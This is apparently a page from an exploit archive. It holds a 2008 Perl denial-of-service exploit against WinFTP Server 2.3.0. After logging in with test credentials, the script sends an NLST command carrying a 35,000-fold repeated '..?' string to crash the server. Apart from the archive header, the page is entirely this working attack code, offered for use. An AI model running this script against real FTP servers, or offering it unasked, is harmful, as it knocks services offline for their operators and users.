WinFTP Server 2.3.0 (NLST) Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WinFTP Server 2.3.0 (NLST) Denial of Service Exploit
# Published : 2008-09-26
# Author : Julien Bedard
# Previous Title : MS Internet Explorer GDI+ Proof of Concept (MS08-052)
# Next Title : Windows Mobile 6.0 Device long name Remote Reboot Exploit

#!/usr/bin/perl
############
#
# Simple Dos Crap for the winftpsrv.exe v.2.3.0
#  by Julien Bedard
#
####################################

use Net::FTP;
$wftpsrvaddr = "255.255.255.255";
$overflow = "..?" x 35000;
$user = "test";
$pass = "test";
$port = 21;

$ftp = Net::FTP->new("$wftpsrvaddr", Debug => 0) || die "Cannot connect to ftp server: $@";
$ftp->login($user,$pass) || die "Cannot login ", $ftp->message;

$ftp->nlst($overflow);
$ftp->quit;

# www.Syue.com [2008-09-26]